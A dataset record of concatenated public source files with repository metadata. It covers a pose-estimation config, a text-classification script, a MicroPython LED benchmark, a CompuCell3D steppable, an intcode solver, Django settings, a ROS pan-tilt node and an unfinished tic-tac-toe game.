    dict(type='TopDownAffine'),
    dict(type='ToTensor'),
    dict(
        type='NormalizeTensor',
        mean=[0.485, 0.456, 0.406],
        std=[0.229, 0.224, 0.225]),
    dict(type='TopDownGenerateTarget', sigma=2),
    dict(
        type='Collect',
        keys=['img', 'target', 'target_weight'],
        meta_keys=[
            'image_file', 'joints_3d', 'joints_3d_visible', 'center', 'scale',
            'rotation', 'bbox_score', 'flip_pairs'
        ]),
]
# Validation/test pipeline: deterministic (no random augmentation).
val_pipeline = [
    dict(type='LoadImageFromFile'),
    dict(type='TopDownAffine'),
    dict(type='ToTensor'),
    dict(
        type='NormalizeTensor',
        mean=[0.485, 0.456, 0.406],
        std=[0.229, 0.224, 0.225]),
    dict(
        type='Collect',
        keys=['img'],
        meta_keys=[
            'image_file', 'center', 'scale', 'rotation', 'bbox_score',
            'flip_pairs'
        ]),
]
test_pipeline = val_pipeline
data_root = 'data/horse10'
# Horse-10 "split2" annotations; val and test share the same file.
data = dict(
    samples_per_gpu=64,
    workers_per_gpu=2,
    val_dataloader=dict(samples_per_gpu=256),
    test_dataloader=dict(samples_per_gpu=256),
    train=dict(
        type='AnimalHorse10Dataset',
        ann_file=f'{data_root}/annotations/horse10-train-split2.json',
        img_prefix=f'{data_root}/',
        data_cfg=data_cfg,
        pipeline=train_pipeline),
    val=dict(
        type='AnimalHorse10Dataset',
        ann_file=f'{data_root}/annotations/horse10-test-split2.json',
        img_prefix=f'{data_root}/',
        data_cfg=data_cfg,
        pipeline=val_pipeline),
    test=dict(
        type='AnimalHorse10Dataset',
        ann_file=f'{data_root}/annotations/horse10-test-split2.json',
        img_prefix=f'{data_root}/',
        data_cfg=data_cfg,
        pipeline=val_pipeline),
)
|
[
"yhyuan@pku.edu.cn"
] |
yhyuan@pku.edu.cn
|
2e0211444ca61afc307df3356ddf5852e08e9341
|
62c9415d11605c6b4b5fb5b527138a3c693f4cd4
|
/code.py
|
d9e5d76da570fe49be9e7d79b1e346c7fe24f4ca
|
[
"MIT"
] |
permissive
|
Azharuddin14/domain-classification-text
|
30e212186f79a47d390fd7eedbda6e052ed27895
|
7cac3f8031781439f3e749f12ec0fd041ba4704a
|
refs/heads/master
| 2022-12-07T18:03:56.990663
| 2020-09-07T06:50:45
| 2020-09-07T06:50:45
| 293,445,735
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,065
|
py
|
# --------------
import pandas as pd
import os
import numpy as np
import warnings
warnings.filterwarnings("ignore")
# path_train : location of test file
# Code starts here
# Loading data. NOTE(review): path_train is not defined in this file —
# per the comment above it is injected by the hosting platform.
df = pd.read_csv(path_train)
print(df.head())
# Function to create new column
def label_race(row):
    """Return the first category whose flag column in *row* is "T".

    Columns are checked in a fixed priority order; if none is "T" the
    message falls into the catch-all "other" category.
    """
    priority_order = ('food', 'recharge', 'support', 'reminders',
                      'travel', 'nearby', 'movies', 'casual')
    for category in priority_order:
        if row[category] == "T":
            return category
    return "other"
# Creating a new column called category which has the column marked as true for that particular message.
df["category"] = df.apply (lambda row: label_race (row),axis=1)
# Dropping all other columns except the category column
drop_col= ["food", "recharge", "support", "reminders", "nearby", "movies", "casual", "other", "travel"]
# NOTE(review): the positional axis argument to drop() is deprecated in
# modern pandas; drop(columns=drop_col) is the current spelling.
df = df.drop(drop_col,1)
print("\nUpdated dataframe:\n",df.head())
#Code ends here
# --------------
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.preprocessing import LabelEncoder
# Sampling only 1000 samples of each category
df = df.groupby('category').apply(lambda x: x.sample(n=1000, random_state=0))
# Code starts here
# Lower-case the messages, vectorise them into a dense TF-IDF matrix
# (English stopwords removed), and label-encode the category names.
all_text = df["message"].str.lower()
tfidf = TfidfVectorizer(stop_words="english")
vector_tfidf = tfidf.fit_transform(all_text)
X = vector_tfidf.toarray()
le = LabelEncoder()
y= le.fit_transform(df['category'])
# --------------
from sklearn.metrics import accuracy_score, classification_report
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import LogisticRegression
from sklearn.svm import LinearSVC
# Code starts here
# 70/30 train/validation split, then three baseline classifiers:
# logistic regression, multinomial naive Bayes, linear SVM.
X_train,X_val,y_train,y_val = train_test_split(X,y,test_size=0.3, random_state=42)
log_reg = LogisticRegression(random_state=0)
log_reg.fit(X_train,y_train)
y_pred = log_reg.predict(X_val)
log_accuracy = log_reg.score(X_val, y_val)
print(log_accuracy)
nb = MultinomialNB()
nb.fit(X_train,y_train)
y_pred = nb.predict(X_val)
nb_accuracy = nb.score(X_val, y_val)
print(nb_accuracy)
lsvm = LinearSVC(random_state=0)
lsvm.fit(X_train,y_train)
y_pred = lsvm.predict(X_val)
# NOTE(review): the extra "score =" alias below looks like a leftover;
# only lsvm_accuracy is referenced afterwards.
lsvm_accuracy = score = lsvm.score(X_val, y_val)
print(lsvm_accuracy)
# --------------
# path_test : Location of test data
#Loading the dataframe
df_test = pd.read_csv(path_test)
#Creating the new column category
df_test["category"] = df_test.apply (lambda row: label_race (row),axis=1)
#Dropping the other columns
drop= ["food", "recharge", "support", "reminders", "nearby", "movies", "casual", "other", "travel"]
df_test= df_test.drop(drop,1)
# Code starts here
all_text = df_test["message"].str.lower()
# Transforming using the tfidf object - tfidf
# (transform only — the vectorizer was fitted on the training data)
X_test = tfidf.transform(all_text).toarray()
# Transforming using label encoder object - le
y_test = le.transform(df_test["category"])
# Predicting using the logistic regression model - logreg
y_pred = log_reg.predict(X_test)
log_accuracy_2 = accuracy_score(y_test,y_pred)
print (str(log_accuracy_2)+(" is the accuracy of the logistic regression model"))
# Predicting using the naive bayes model - nb
y_pred = nb.predict(X_test)
nb_accuracy_2 = accuracy_score(y_test,y_pred)
print (str(nb_accuracy_2)+(" is the accuracy of the Naive Bayes model"))
# Predicting using the linear svm model - lsvm
y_pred = lsvm.predict(X_test)
lsvm_accuracy_2 = accuracy_score(y_test,y_pred)
print (str(lsvm_accuracy_2)+(" is the accuracy of the Support Vector model"))
# --------------
from nltk.corpus import stopwords
from nltk.stem.wordnet import WordNetLemmatizer
import string
import gensim
from gensim.models.lsimodel import LsiModel
from gensim import corpora
from pprint import pprint
# import nltk
# nltk.download('wordnet')
# Creating a stopwords list (requires the nltk 'stopwords' and
# 'wordnet' corpora to be downloaded — see the commented lines above).
stop = set(stopwords.words('english'))
exclude = set(string.punctuation)
lemma = WordNetLemmatizer()
# Normalise a raw document for topic modelling.
def clean(doc):
    """Lowercase *doc*, drop stopwords and punctuation, lemmatize words.

    Relies on the module-level ``stop``, ``exclude`` and ``lemma``
    objects defined above; returns a single space-joined string.
    """
    without_stopwords = " ".join(
        word for word in doc.lower().split() if word not in stop)
    without_punctuation = "".join(
        ch for ch in without_stopwords if ch not in exclude)
    return " ".join(
        lemma.lemmatize(word) for word in without_punctuation.split())
# Creating a list of documents from the complaints column
list_of_docs = df["message"].tolist()
# Implementing the function for all the complaints of list_of_docs
doc_clean = [clean(doc).split() for doc in list_of_docs]
# Code starts here
# Build the gensim id<->token dictionary and bag-of-words corpus, then
# fit a 5-topic LSI model on it.
dictionary = corpora.Dictionary(doc_clean)
doc_term_matrix = [dictionary.doc2bow(doc) for doc in doc_clean]
lsimodel = LsiModel(corpus=doc_term_matrix, num_topics=5, id2word=dictionary)
# --------------
from gensim.models import LdaModel
from gensim.models import CoherenceModel
# doc_term_matrix - Word matrix created in the last task
# dictionary - Dictionary created in the last task
# Function to calculate coherence values
def compute_coherence_values(dictionary, corpus, texts, limit, start=2, step=3):
    """
    Compute c_v coherence for various numbers of topics.

    BUG FIX: the LDA model was previously trained on the module-level
    ``doc_term_matrix`` instead of the ``corpus`` argument, silently
    ignoring whatever corpus the caller passed in; it now uses
    ``corpus``. (The only current caller passes corpus=doc_term_matrix,
    so existing results are unchanged.)

    Parameters:
    ----------
    dictionary : Gensim dictionary
    corpus : Gensim bag-of-words corpus
    texts : List of tokenized input texts
    limit : Max num of topics (exclusive)
    start, step : range of topic counts to try
    Returns:
    -------
    topic_list : No. of topics chosen
    coherence_values : Coherence values corresponding to the LDA model with respective number of topics
    """
    coherence_values = []
    topic_list = []
    for num_topics in range(start, limit, step):
        model = gensim.models.ldamodel.LdaModel(
            corpus, random_state=0, num_topics=num_topics,
            id2word=dictionary, iterations=10)
        topic_list.append(num_topics)
        coherencemodel = CoherenceModel(
            model=model, texts=texts, dictionary=dictionary, coherence='c_v')
        coherence_values.append(coherencemodel.get_coherence())
    return topic_list, coherence_values
# Code starts here
# Calling the function: try topic counts 1, 6, 11, ..., 36.
topic_list, coherence_value_list = compute_coherence_values(dictionary=dictionary, corpus=doc_term_matrix, texts=doc_clean, start=1, limit=41, step=5)
print(coherence_value_list)
# Finding the index associated with maximum coherence value
max_index=coherence_value_list.index(max(coherence_value_list))
# Finding the optimum no. of topics associated with the maximum coherence value
opt_topic= topic_list[max_index]
print("Optimum no. of topics:", opt_topic)
# Implementing LDA with the optimum no. of topic
lda_model = LdaModel(corpus=doc_term_matrix, num_topics=opt_topic, id2word = dictionary, iterations=10, passes = 30,random_state=0)
# pprint(lda_model.print_topics(5))
# NOTE(review): the return value below is discarded — only useful as
# the last expression of a notebook cell.
lda_model.print_topic(1)
|
[
"Azharuddin14@users.noreply.github.com"
] |
Azharuddin14@users.noreply.github.com
|
f92ed0c62fdc28da985503e7660f91196db17a1b
|
5fa0d9913d02e3712c60614a581c4d979b92d6f4
|
/esp32_wroom/fastLED/fastLED_7.py
|
d4ab1adae33ddad5914bdda57eb8139a0c57abab
|
[] |
no_license
|
bvhest/IoT-01_Playground
|
865c15b8221c717761a07c34944231c70cf4990c
|
8ef29f577f90e97af740ad0a7040948e8d617050
|
refs/heads/master
| 2020-05-19T21:48:38.689177
| 2019-06-25T20:12:12
| 2019-06-25T20:12:12
| 185,233,822
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 929
|
py
|
import machine, time, stm
# (blue) on-board LED: GPIO2 on the ESP32 board, driven as an output.
led = machine.Pin(2, machine.Pin.OUT)
# Total number of blink cycles requested per benchmark run.
N = 100000
# Switch the LED on and off directly via functions,
# with the bound methods pre-loaded into locals,
# the loop body hand-unrolled,
# and the @micropython.native decorator emitting native machine code.
# NOTE(review): the body contains 9 on/off pairs while n is divided by
# 10 — either one pair is missing or the divisor is off by one; confirm
# the intended unroll factor (the name says "unrolled8").
@micropython.native
def blink_preload_unrolled8_native(n):
    n //= 10
    aan = led.on   # "aan" = on
    uit = led.off  # "uit" = off
    r = range(n)
    for i in r:
        aan()
        uit()
        aan()
        uit()
        aan()
        uit()
        aan()
        uit()
        aan()
        uit()
        aan()
        uit()
        aan()
        uit()
        aan()
        uit()
        aan()
        uit()
def timer(f, n):
    """Run f(n) and print elapsed time, per-blink cost and blink rate.

    BUG FIX: the printed statistics previously used the module-level
    constant N instead of the ``n`` argument, so calling timer() with
    any other count reported wrong per-blink figures; they now use
    ``n``. (The existing call passes n=N, so its output is unchanged.)
    """
    t0 = time.ticks_us()
    f(n)
    t1 = time.ticks_us()
    # ticks_diff handles the wrap-around of the microsecond counter.
    dt = time.ticks_diff(t1, t0)
    fmt = "{:5.3f} s, {:6.3f} uSec/blink : {:8.2f} kHz/s"
    print(fmt.format(dt * 1e-6, dt / n, n / dt * 1e3))

timer(blink_preload_unrolled8_native, N)
|
[
"hestbv@gmail.com"
] |
hestbv@gmail.com
|
c269d84d1b1f238b273350a6705d59ed13399793
|
ae2812cd2824383705c3132e10db37ab453d0ce9
|
/src/agazebo/scripts/pan_and_tilt_turn.py
|
dfa6a935778a488caa7745ea406b89bf66ca7938
|
[] |
no_license
|
RBaldanzini/TiltRoboPan
|
fa978d0eb33677061b8f7159a1195dde91bfad2c
|
6df0bc415e5ff5f04aa540408dab88cb29553901
|
refs/heads/main
| 2023-05-28T03:30:43.874285
| 2021-06-18T21:47:45
| 2021-06-18T21:47:45
| 378,255,180
| 0
| 0
| null | 2021-06-18T21:47:45
| 2021-06-18T20:10:05
|
Python
|
UTF-8
|
Python
| false
| false
| 5,196
|
py
|
#!/usr/bin/python
import rospy
import math
import time
from std_msgs.msg import Float64
from geometry_msgs.msg import Point
from geometry_msgs.msg import Twist
from std_msgs.msg import Bool
# Drive-wheel radius used for the base-turn timing in
# PanTilt.pan_and_tilt_move — presumably metres; confirm units.
r_wheel = 0.06
#
# def pan_and_tilt_search(self):
#
# """
# Topic Publisher
# """
# while not rospy.is_shutdown():
#
# rospy.loginfo("TRYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYy")
# for angle in range(-90, 90, 1):
# print("Moving Yaw=" + str(angle))
# yaw_in_radians = math.radians(angle)
# pan_angle_msg = Float64()
# pan_angle_msg.data = yaw_in_radians
# # Publish Joint Position
# self.pub_pan_position.publish(pan_angle_msg)
# time.sleep(0.1)
# # break
# break
class PanTilt:
    """Sweeps the pan joint to search for a line, then turns the robot.

    Subscribes to the detected line centre (/line/point_line) and a
    button topic (/button); publishes wheel commands (/cmd_vel) and
    pan/tilt joint position commands.
    """

    def __init__(self):
        self.sub_center = rospy.Subscriber("/line/point_line", Point, self.update_message)
        rospy.init_node('is_line_following')
        self.sub_bool = rospy.Subscriber("/button", Bool, self.update_bool)
        self.pub_twist = rospy.Publisher("/cmd_vel", Twist, queue_size=20, latch=True)
        self.pub_pan_position = rospy.Publisher(
            '/pan_and_tilt/yaw_joint_position_controller/command',
            Float64,
            queue_size=1)
        self.pub_tilt_position = rospy.Publisher(
            '/pan_and_tilt/pitch_joint_position_controller/command',
            Float64,
            queue_size=1)
        # Latest line-centre coordinates from /line/point_line
        # (units depend on the publisher — TODO confirm).
        self.center_x = 0.0
        self.center_y = 0.0
        self.center_z = 0.0
        # Latest button state; .data defaults to False until a message arrives.
        self._bool = Bool()
        self._message = Twist()

    def update_message(self, message):
        """Subscriber callback: cache the latest line-centre Point."""
        # self.lost_line = time.time()
        #print(self.lost_line)
        self.center_x = message.x
        self.center_y = message.y
        self.center_z = message.z
        rospy.loginfo("Centres detected: %.1f %.1f %.1f" % (self.center_x, self.center_y, self.center_z))
        return self.center_x, self.center_y, self.center_z

    # @property
    def update_bool(self, mgs):
        """Subscriber callback: cache the latest button Bool message."""
        # self.lost_line = time.time()
        self._bool = mgs
        # print(self._bool)
        return self._bool

    def pan_and_tilt_move(self):
        """
        Topic Publisher.

        While the button is not pressed, sweep the pan joint from 10 to
        89 degrees; once a line centre has been seen (center_x truthy),
        re-centre the pan joint and rotate the base for a duration
        derived from the current sweep angle and the wheel radius.
        """
        while not rospy.is_shutdown():
            rospy.loginfo("NNNNOOOOOOOOOOOOOOO")
            while self._bool.data is False:
                print("bbbbbbbbbb")
                for angle in range(10, 90, 1):
                    print("Moving Yaw=" + str(angle))
                    yaw_in_radians = math.radians(angle)
                    pan_angle_msg = Float64()
                    pan_angle_msg.data = yaw_in_radians
                    # Publish Joint Position
                    self.pub_pan_position.publish(pan_angle_msg)
                    time.sleep(0.1)
                    if self.center_x:
                        # break
                        # Line seen: re-centre pan, then rotate the base.
                        self.pub_pan_position.publish(0)
                        steer_action = -0.1
                        print("aaaaaaaaaaa")
                        self._message.angular.z = steer_action
                        rospy.loginfo("cmd_vel==" + str(self._message))
                        self.pub_twist.publish(self._message)
                        # angle_r = angle * math.radians(angle)
                        # Turn duration from chord length 2*r*sin(angle)
                        # over the steering rate (sign flipped).
                        turn_time = 10 * ((2 * r_wheel) * (math.sin(math.radians(angle))) / steer_action * -1)
                        print(turn_time)
                        time.sleep(turn_time)
                        # if -30 < self.center_z < 30:
                        # Stop rotating.
                        steer_action = 0.0
                        self._message.angular.z = steer_action
                        self.pub_twist.publish(self._message)
                        # break
                # break
            while self._bool.data is True:
                print("cccccc")
                # if not self._bool:
                #     print("gggggggg")
                #     pass
                # for angle in range(90, -90, -1):
                #     print("Moving Yaw=" + str(angle))
                #     yaw_in_radians = math.radians(angle)
                #     pan_angle_msg = Float64()
                #     pan_angle_msg.data = yaw_in_radians
                #     # Publish Joint Position
                #     self.pub_pan_position.publish(pan_angle_msg)
                #     time.sleep(0.15)
                #     print(self.center_z)
                #     if not self.center_z:
                #         steer_action = -0.2
                #         throttle_action = 0.1
                #         print("aaaaaaaaaaa")
                #         self._message.linear.x = throttle_action
                #         self._message.angular.z = steer_action
                #         # rospy.loginfo("cmd_vel==" + str(self._message))
                #         self.pub_twist.publish(self._message)
                #         break
                # break
if __name__ == "__main__":
    # while not rospy.is_shutdown():
    # rospy.Rate(10)
    # rospy.spin()
    pan_tilt = PanTilt()
    # pan_and_tilt_move() loops until rospy shutdown, so the code below
    # only runs once the node is shutting down.
    pan_tilt.pan_and_tilt_move()
    try:
        rospy.spin()
        # NOTE(review): spin() blocks until shutdown, so this Rate(10)
        # object is created only afterwards and has no effect.
        rospy.Rate(10)
    except KeyboardInterrupt:
        print("Shutting down")
|
[
"baldanzinirenato@gmail.com"
] |
baldanzinirenato@gmail.com
|
7f60cafb6d78687117fb140a44791d72b45d5b8a
|
d2b51467e5dcfe9eeabbf2aa6c450baa0301ca9d
|
/usertracking/urls.py
|
89dd70e5bf02c856af9de3b8ca0e51456a6f3bc9
|
[] |
no_license
|
humbhenri/usertracking_django
|
bc95ddbb52cd60c5949c623c7858876d338b0237
|
e883955dcc4594a6e02b98cc834a411db4770f7d
|
refs/heads/master
| 2021-01-23T07:03:31.989728
| 2014-12-23T01:15:39
| 2014-12-23T01:15:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 329
|
py
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
# URL routes for the project: Django admin plus the userapp routes.
# NOTE(review): patterns() is the legacy Django URLconf API, removed in
# newer Django versions — this module targets an older release.
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'usertracking.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),

    url(r'^admin/', include(admin.site.urls)),
    url(r'^userapp/', include('userapp.urls')),
)
|
[
"humbhenri@gmail.com"
] |
humbhenri@gmail.com
|
fcb36c510c8b2b34d0e1b7a9bd455d161fdc4d7d
|
51f68500c156042b8dc900e5e574cb0ae03bafd8
|
/jaso_hello.py
|
4a73260a273746b2ad0d58178d3fd3854b5951bf
|
[] |
no_license
|
JSoyinka/GithubAzureGuide
|
4e4ae9b9c19d1928621dbabe85148f2750020069
|
c7604f02841e5ac7a2de46bce0c93e231a97f8a3
|
refs/heads/master
| 2021-06-20T18:27:34.281723
| 2019-08-16T23:51:18
| 2019-08-16T23:51:18
| 194,110,847
| 0
| 1
| null | 2021-06-10T23:36:38
| 2019-06-27T14:30:55
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 278
|
py
|
import matplotlib.pyplot as plt
import numpy as np
x = np.linspace(0, 20, 100)  # Create a list of evenly-spaced numbers over the range
plt.plot(x, np.sin(x))  # Plot the sine of each x point
plt.show()  # Display the plot (blocks until the window is closed)
msg = "Hello world"
print(msg)
|
[
"t-jaso@microsoft.com"
] |
t-jaso@microsoft.com
|
05d4acaf0415301b70a2b2281ba345868861f33c
|
632dcb4e37cadd87cb7ff8715b0048df5cd0d11b
|
/CompuCell3D/core/Demos/BookChapterDemos_ComputationalMethodsInCellBiology/cellsorting/Simulation/cellsortingSteppables.py
|
1552917cd841bd0d99c7773c8f864b12590c4435
|
[
"MIT"
] |
permissive
|
CompuCell3D/CompuCell3D
|
df638e3bdc96f84b273978fb479842d071de4a83
|
65a65eaa693a6d2b3aab303f9b41e71819f4eed4
|
refs/heads/master
| 2023-08-26T05:22:52.183485
| 2023-08-19T17:13:19
| 2023-08-19T17:13:19
| 12,253,945
| 51
| 41
| null | 2023-08-27T16:36:14
| 2013-08-20T20:53:07
|
C++
|
UTF-8
|
Python
| false
| false
| 524
|
py
|
from cc3d.core.PySteppables import *
class CellSortingSteppable(SteppableBasePy):
    """Steppable that logs the id of every cell each time it runs."""

    def __init__(self, frequency=10):
        SteppableBasePy.__init__(self, frequency)

    def start(self):
        """Runs once before MCS=0; nothing to initialise here."""
        pass

    def step(self, mcs):
        """Runs every `frequency` MCS: print the id of every cell."""
        for c in self.cellList:
            print("cell.id=", c.id)

    def finish(self):
        """Runs once after the last MCS; nothing to clean up."""
        pass
|
[
"maciekswat@gmail.com"
] |
maciekswat@gmail.com
|
b70c06650c879742828e6579365f7880481ebc1d
|
71892c14e8029130056b7cb33c4d5edba85c4ba7
|
/2019/2/part2.py
|
05f63f2b33f900ad61f79dd5384599629eebc8bd
|
[] |
no_license
|
Clearyoi/adventofcode
|
960902d1c1a7ee4894b64273dc7d27a35d3461f6
|
0959f66df0cdfbcd31498ff4ac036298aa63b332
|
refs/heads/master
| 2021-07-12T01:41:32.188061
| 2020-12-14T13:04:14
| 2020-12-14T13:04:14
| 225,496,204
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 482
|
py
|
import sys
def run_comp(noun, verb):
    """Run the intcode program from input.txt with the given noun/verb.

    Returns the value left at address 0 when opcode 99 halts the
    program, or -1 on an unrecognised opcode.
    NOTE(review): `while mem[i]` exits silently (implicitly returning
    None) if an opcode of 0 is ever reached, and input.txt is re-read
    on every call — acceptable for a puzzle script, but worth knowing.
    """
    mem = [int(x) for x in open("input.txt").read().strip().split(',')]
    mem[1] = noun
    mem[2] = verb
    i = 0
    while mem[i]:
        if mem[i] == 99:
            return mem[0]
        elif mem[i] == 1:
            # Opcode 1: add the values at the two operand addresses.
            mem[mem[i+3]] = mem[mem[i+1]] + mem[mem[i+2]]
        elif mem[i] == 2:
            # Opcode 2: multiply the values at the two operand addresses.
            mem[mem[i+3]] = mem[mem[i+1]] * mem[mem[i+2]]
        else:
            return -1
        i = i + 4
for i in range(0, 99):
for j in range(0, 99):
if run_comp(i, j) == 19690720:
print 100 * i + j
sys.exit()
|
[
"clearyoi@tcd.ie"
] |
clearyoi@tcd.ie
|
f96566b7f51d80a388074bf74e5f9a0d52dfe150
|
3d25b307a56f9cb437a81615e3bd0e6fde195005
|
/app/app/settings.py
|
237c13baad0f8f0fd4bb00437c53dcfd0d3d0e28
|
[
"MIT"
] |
permissive
|
abu271/drf_recipe
|
ae6c9a115f4da23dd2e01573d2af73f5e5e109d5
|
4902572e59ecc8c7de1e58e263213ba2e4c996bd
|
refs/heads/master
| 2023-02-28T13:02:10.291428
| 2021-02-04T00:18:51
| 2021-02-04T00:18:51
| 287,782,841
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,479
|
py
|
"""
Django settings for app project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): hard-coded key — move to an environment variable before deploying.
SECRET_KEY = '3)0s%n4a39-$ks*u!v)u=!3ik9ll5++u)*-yc6mu(32@3t33_j'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # DRF + token auth for the API endpoints.
    'rest_framework',
    'rest_framework.authtoken',
    # Project apps.
    'core',
    'user',
    'recipe'
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# Connection parameters come from the environment (docker-compose style).
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'HOST': os.environ.get('DB_HOST'),
        'NAME': os.environ.get('DB_NAME'),
        'USER': os.environ.get('DB_USER'),
        'PASSWORD': os.environ.get('DB_PASSWORD'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
# Served from a shared docker volume.
STATIC_ROOT = '/vol/web/static'
MEDIA_ROOT = '/vol/web/media'
# Override default django user model with core user model
AUTH_USER_MODEL = 'core.User'
|
[
"abudarda166@gmail.com"
] |
abudarda166@gmail.com
|
23dccdc3c63a1b7f21c7f9809367669ea45dd9b7
|
51c5c7c9250d8bff33d3b775c29fe2ec2e653438
|
/GameTickTack.py
|
c392bfa933537cf8ae0777c430e0aab625c2842a
|
[] |
no_license
|
rohitbansal83/Python3
|
cbfe8f987d2b6f27a788fffdf0be5a6c865c4110
|
002cf74d176c9a410803dfd58f24f4e8eeb9d6ac
|
refs/heads/master
| 2020-03-19T09:01:23.017858
| 2018-06-06T02:03:42
| 2018-06-06T02:03:42
| 136,253,887
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,241
|
py
|
def selectplayer():
    """Ask which symbol player 1 wants and build the symbol<->player map.

    Populates the global `d` both ways: symbol -> player name and
    player name -> symbol. Any answer other than exactly 'X' gives
    player 1 the 'O' symbol (the check is case-sensitive).
    """
    global d
    choice = input("Please Select X or O for Player 1: ")
    p1_symbol = 'X' if choice == 'X' else 'O'
    p2_symbol = 'O' if p1_symbol == 'X' else 'X'
    d = {p1_symbol: 'P1', p2_symbol: 'P2', 'P1': p1_symbol, 'P2': p2_symbol}
def isgamewon():
    """Return the winning player ('P1'/'P2') or 'N' if nobody has won yet.

    Reads the global board `b` ('E' marks an empty cell) and the global
    symbol/player map `d`.
    """
    global b
    global d
    for idx in range(3):
        # Column idx.
        if b[0][idx] == b[1][idx] == b[2][idx] and b[0][idx] != 'E':
            return d[b[0][idx]]
        # Row idx.
        if b[idx][0] == b[idx][1] == b[idx][2] and b[idx][0] != 'E':
            return d[b[idx][0]]
    # Both diagonals pass through the centre cell.
    if b[1][1] != 'E' and (b[0][0] == b[1][1] == b[2][2] or b[0][2] == b[1][1] == b[2][0]):
        return d[b[1][1]]
    return 'N'
def isgamedrawn():
    """Return True when no row, column or diagonal can still be won.

    A line is "dead" once it contains at least one 'X' AND at least one
    'O'; the game is drawn when every one of the eight lines is dead.
    Reads the global board `b`.
    """
    global b
    for x in range(3):
        # BUGFIX: the original used `l = b[:][x]`, but b[:] just copies the
        # outer list, so b[:][x] is ROW x — columns were never checked.
        column = [b[0][x], b[1][x], b[2][x]]
        if column.count('X') == 0 or column.count('O') == 0:
            return False
        row = b[x][:]
        if row.count('X') == 0 or row.count('O') == 0:
            return False
    diagonal = [b[0][0], b[1][1], b[2][2]]
    if diagonal.count('X') == 0 or diagonal.count('O') == 0:
        return False
    anti_diagonal = [b[0][2], b[1][1], b[2][0]]
    if anti_diagonal.count('X') == 0 or anti_diagonal.count('O') == 0:
        return False
    return True
def getinputp1():
    """Prompt player 1 for a 1-based row/column and place their symbol."""
    row= input("(Player 1) Select the row for next move: ")
    col= input("(Player 1) Select the col for next move: ")
    putinput (d['P1'],row,col)
def getinputp2():
    """Prompt player 2 for a 1-based row/column and place their symbol."""
    row= input("(Player 2) Select the row for next move: ")
    col= input("(Player 2) Select the col for next move: ")
    putinput (d['P2'],row,col)
def putinput(move,row,col):
    """Write `move` onto the global board at 1-based (row, col), then echo it.

    row/col arrive as strings from input() and are converted here.
    """
    global b
    b[int(row)-1][int(col)-1] = move
    print (b[0])
    print (b[1])
    print (b[2])
def game():
    """Play one full game: alternate P1/P2 turns until a win or a draw."""
    global b
    # NOTE(review): drawboard() is not defined anywhere in this file — this
    # call would raise NameError; confirm it exists elsewhere or remove it.
    drawboard()
    selectplayer()
    winner = isgamewon()
    while winner == 'N' and isgamedrawn()==False:
        getinputp1()
        winner = isgamewon()
        if winner!='N':
            print ("Congratulation Player "+ winner +". You have won!")
            print(b[0])
            print(b[1])
            print(b[2])
            break
        elif isgamedrawn():
            print ("Game Drawn!")
            break
        getinputp2()
        winner = isgamewon()
        if winner!='N':
            print ("Congratulation Player "+ winner +". You have won!")
            break
        elif isgamedrawn():
            print ("Game Drawn!")
            break
def playmore():
    """Ask whether to play again; True only for an exact 'Y' or 'y' answer."""
    global gamecount
    gamecount = input("do you want to playmore: ")
    if gamecount == 'Y' or gamecount =='y':
        return True
    else:
        return False
def gameset():
    """Play games until the player declines, then announce the end."""
    game()
